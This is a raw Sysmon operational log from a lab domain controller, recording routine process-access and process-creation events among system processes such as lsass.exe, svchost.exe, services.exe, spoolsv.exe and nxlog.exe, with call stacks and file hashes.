15:51:15.691{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001205Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.691{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001204Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.691{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001203Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.691{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001202Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.691{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001201Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.691{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001200Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.691{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001199Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.691{D28789B6-7C62-5FA1-0B00-000000008801}86892C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001198Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.691{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001197Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.691{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C65-5FA1-1B00-000000008801}2176C:\Program Files (x86)\nxlog\nxlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001196Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.691{D28789B6-7C62-5FA1-0A00-000000008801}852944C:\Windows\system32\services.exe{D28789B6-7C65-5FA1-1B00-000000008801}2176C:\Program Files (x86)\nxlog\nxlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001195Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.697{D28789B6-7C73-5FA1-2E00-000000008801}2176C:\Program Files (x86)\nxlog\nxlog.exe-----"C:\Program Files (x86)\nxlog\nxlog.exe" -c "C:\Program Files (x86)\nxlog\conf\nxlog.conf"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=EDE0FA11A10EF649A05AC992D0231673,SHA256=B66FA8592904D8502747C78C79D5B3E86C9ED7383A8159209BB2740BB92070EC,IMPHASH=517158273EC1C6D5E65120E91DD2284A{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001194Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.691{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001193Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.691{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001192Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.691{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001191Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.659{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C73-5FA1-2C00-000000008801}2800C:\Windows\System32\spoolsv.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001190Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.659{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C73-5FA1-2C00-000000008801}2800C:\Windows\System32\spoolsv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001189Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.644{D28789B6-7C62-5FA1-0A00-000000008801}852912C:\Windows\system32\services.exe{D28789B6-7C73-5FA1-2C00-000000008801}2800C:\Windows\System32\spoolsv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001188Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.644{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7C73-5FA1-2C00-000000008801}2800C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001187Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.644{D28789B6-7C62-5FA1-0A00-000000008801}852940C:\Windows\system32\services.exe{D28789B6-7C73-5FA1-2C00-000000008801}2800C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001186Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.637{D28789B6-7C73-5FA1-2C00-000000008801}2800C:\Windows\System32\spoolsv.exe10.0.14393.3808 (rs1_release.200707-2105)Spooler SubSystem AppMicrosoft® Windows® Operating SystemMicrosoft Corporationspoolsv.exeC:\Windows\System32\spoolsv.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=0105816460F59AAC077848616872DD7C,SHA256=37297B9EED859DBA103252CD3CFDBD88DC752C96D001A3C0E5FBF9F11D2ABAFF,IMPHASH=5788588905781015CF350C5A9ABBA1F2{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001185Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.628{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001184Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.628{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001183Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.628{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001182Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.628{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001181Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.597{D28789B6-7C73-5FA1-2B00-000000008801}27242940C:\Windows\System32\svchost.exe{D28789B6-7C64-5FA1-1000-000000008801}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\wersvc.dll+16ee|c:\windows\system32\wersvc.dll+1b30|c:\windows\system32\wersvc.dll+5581|c:\windows\system32\wersvc.dll+4688|C:\Windows\SYSTEM32\ntdll.dll+803e4|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001180Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.550{D28789B6-7C62-5FA1-0A00-000000008801}852912C:\Windows\system32\services.exe{D28789B6-7C73-5FA1-2B00-000000008801}2724C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001179Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 